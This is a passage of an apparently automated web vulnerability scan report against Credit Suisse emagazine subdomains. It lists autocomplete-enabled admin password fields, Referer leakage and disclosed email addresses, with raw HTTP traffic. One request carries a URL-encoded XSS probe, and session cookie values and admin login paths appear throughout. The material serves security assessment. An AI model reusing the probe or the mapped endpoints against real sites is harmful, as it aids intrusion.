Content-Type: text/html; charset=UTF-8


5. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. https://infocus.credit-suisse.com/app/_control/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_control/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /app/_control/ HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:34:54 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:54 GMT
expires: Mon, 19 Sep 2011 15:34:54 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>EMAGAZINE [ ADMIN MODE ]</title>
<link rel="STYLESHEET" type="text/css" href="https://admin.emagazine.
...[SNIP]...
<body class="jamezMainbody">
<form action="act_login_adminmode.cfm?lang=EN&client=&doid=" method="POST" target="_top">
<table border="0" cellpadding="0" cellspacing="1" align="center" bgcolor="gray" width="450">
...[SNIP]...
<td class="jamezMainContentText" height="24"><input type="password" class="jamezIbx250" name="fld_Password" size="20" required="Yes" message="Please fill the Password"></td>
...[SNIP]...

5.2. https://responsibility.credit-suisse.com/app/_control/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/_control/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /app/_control/ HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://responsibility.credit-suisse.com/robots.txt
Cookie: bhCookieSess=1; bhCookiePerm=1; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749; CFID=38646949; CFTOKEN=99323788

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:20 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>EMAGAZINE [ ADMIN MODE ]</title>
<link rel="STYLESHEET" type="text/css" href="https://admin.emagazine.
...[SNIP]...
<body class="jamezMainbody">
<form action="act_login_adminmode.cfm?lang=EN&client=&doid=" method="POST" target="_top">
<table border="0" cellpadding="0" cellspacing="1" align="center" bgcolor="gray" width="450">
...[SNIP]...
<td class="jamezMainContentText" height="24"><input type="password" class="jamezIbx250" name="fld_Password" size="20" required="Yes" message="Please fill the Password"></td>
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 10 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. https://infocus.credit-suisse.com/app/_control/act_login_adminmode.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/_control/act_login_adminmode.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/_control/act_login_adminmode.cfm?lang=EN&client=&doid= HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:54 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:54 GMT
expires: Mon, 19 Sep 2011 15:38:54 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- OMNITURE ON//-->


<!-- SiteCatalyst code version: H.22.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.2. https://infocus.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:34:35 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:35 GMT
expires: Mon, 19 Sep 2011 15:34:35 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.3. https://infocus.credit-suisse.com/app/article/index3.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index3.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/article/index3.cfm?fuseaction=ShowImageDetail&cimgoid=318996&pimgoid=318995 HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:32 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:33 GMT
expires: Mon, 19 Sep 2011 15:38:33 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


               <SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
       //<![CDATA[
           // RESIZER FINCTION
           function resizer(){window.resizeTo(675,710);}
           window.onload=resizer;
       //]]>
       </SCRIPT>    
...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.4. https://infocus.credit-suisse.com/app/print/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/print/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/print/index.cfm?fuseaction=OpenSendPage&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:45 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:46 GMT
expires: Mon, 19 Sep 2011 15:46:46 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<link type='text/css' rel='stylesheet' href='/app/_css/FF.css'>

<div style="text-align:left; margin:15px;">
<img src="https://emagazine.credit-suisse.com/a
...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.5. https://infocus.credit-suisse.com/app/rss/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/rss/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/rss/index.cfm?fuseaction=OpenRSS&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:38 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:38 GMT
expires: Mon, 19 Sep 2011 15:38:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.6. https://infocus.credit-suisse.com/app/sendpage/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/sendpage/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/sendpage/index.cfm?fuseaction=OpenSendPage&aoid=318646&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://infocus.credit-suisse.com/app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN&bhjs=-1
Cookie: bhCookieSess=1; bhCookiePerm=1; CFID=38646949; CFTOKEN=99323788; CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:38:37 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:38:38 GMT
expires: Mon, 19 Sep 2011 15:38:38 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.7. https://infocus.credit-suisse.com/app/topic/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/topic/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/topic/index.cfm?fuseaction=OpenTopic&coid=282917&lang=en HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:52 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:53 GMT
expires: Mon, 19 Sep 2011 15:46:53 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.8. https://responsibility.credit-suisse.com/app/_control/act_login_adminmode.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/_control/act_login_adminmode.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/_control/act_login_adminmode.cfm?lang=EN&client=&doid= HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:30 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:30 GMT
expires: Mon, 19 Sep 2011 15:37:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!-- OMNITURE ON//-->


<!-- SiteCatalyst code version: H.22.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->

...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.9. https://responsibility.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=319249&coid=64291&lang=EN HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:33:21 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:33:21 GMT
expires: Mon, 19 Sep 2011 15:33:21 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

6.10. https://responsibility.credit-suisse.com/app/article/index3.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://responsibility.credit-suisse.com
Path:   /app/article/index3.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /app/article/index3.cfm?fuseaction=ShowImageDetail&cimgoid=319281&pimgoid=319280 HTTP/1.1
Host: responsibility.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:37:11 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:37:11 GMT
expires: Mon, 19 Sep 2011 15:37:11 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


               <SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
       //<![CDATA[
           // RESIZER FINCTION
           function resizer(){window.resizeTo(716,727);}
           window.onload=resizer;
       //]]>
       </SCRIPT>    
...[SNIP]...
<noscript><img src="https://absolutedevelopment.122.2o7.net/b/ss/ad.cs.infocus/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 22 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. https://emagazine.credit-suisse.com/app/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/

Issue detail

The following email address was disclosed in the response:

Request

GET /app/home/ HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:30 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:30 GMT
expires: Mon, 19 Sep 2011 15:46:30 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...

7.2. https://emagazine.credit-suisse.com/app/home/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /app/home/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /app/home/index.cfm HTTP/1.1
Host: emagazine.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:29 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:29 GMT
expires: Mon, 19 Sep 2011 15:46:29 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...

7.3. https://emagazine.credit-suisse.com/jamez_customtags/control/functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://emagazine.credit-suisse.com
Path:   /jamez_customtags/control/functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jamez_customtags/control/functions.js HTTP/1.1
Host: emagazine.credit-suisse.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://emagazine.credit-suisse.com/app/home/index.cfm?8cac8%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea9cebca0244=1
Cookie: CFID=38646949; CFTOKEN=99323788; bhCookieSess=1; bhCookiePerm=1

Response

HTTP/1.1 200 OK
Date: Mon, 19 Sep 2011 14:56:55 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 10:49:30 GMT
ETag: "10000000279fe-bcf-480e33ca8a6e3"
Accept-Ranges: bytes
Content-Length: 3023
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* ************************************************************ */
/* Javascript */
/* ************************************************************
...[SNIP]...
*/
/* version : 1.0 */
/* created at : 26.04.03 */
/* created by : altug salini as@absolute.ch */
/* ************************************************************ */

/* %%%%%%%%%%%% CONTROL FUNCTIONS %%%%%%%%%%% */

/* opwn update window */
var updateText=0;
function edit(t
...[SNIP]...

7.4. https://infocus.credit-suisse.com/app/article/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/article/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /app/article/index.cfm?fuseaction=OpenArticle&aoid=318646&coid=118&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://www.credit-suisse.com/us/en/
Cookie: CsgBasePath=/us/; imagerotation=0/0; WT_FPC=id=2d3afed903236bcd0051316482406749:lv=1316482406749:ss=1316482406749

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:34:35 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:34:35 GMT
expires: Mon, 19 Sep 2011 15:34:35 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...
<a href="mailto:emagazine.feedback@credit-suisse.com" title="Mail : emagazine.feedback@credit-suisse.com">
...[SNIP]...

7.5. https://infocus.credit-suisse.com/app/legal/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/legal/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /app/legal/index.cfm?fuseaction=LegalCheck&page=%2Findex%2Ecfm%3Ffuseaction%3DOpenTopic%26coid%3D90%26lang%3DEN&country=XY HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 302 Moved Temporarily
Date: Mon, 19 Sep 2011 14:46:50 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Last-Modified: Mon, 19 Sep 2011 14:46:51 GMT
location: /app/legal/index.cfm?fuseaction=NoAccess
expires: Mon, 19 Sep 2011 15:46:51 GMT
Content-Language: en-US
Cache-Control: public, max-age=3600, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
   <link rel="icon" href="/favicon.ico"
...[SNIP]...
<meta name="EMail" content="emagazine.feedback@credit-suisse.com" />
...[SNIP]...

7.6. https://infocus.credit-suisse.com/app/print/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://infocus.credit-suisse.com
Path:   /app/print/index.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /app/print/index.cfm?fuseaction=OpenTopic&coid=90&lang=EN HTTP/1.1
Host: infocus.credit-suisse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 19 Sep 2011 14:46:45 GMT
Server: Apache
Set-Cookie: CFID=38646949; HttpOnly;domain=.credit-suisse.com;Secure;path=/
Set-Cookie: CFTOKEN=99323788; HttpOnly;domain=.credit-suisse.com;Secure;path=/
pragma: no-cache
Last-Modified: Mon, 19 Sep 2011 14:46:45 GMT
expires: {ts '2011-09-19 16:46:45'}
Content-Language: en-US
Cache-Control: no-cache, no-store, must-revalidate
Connection: close
Content-Type: text/html; charset=UTF-8


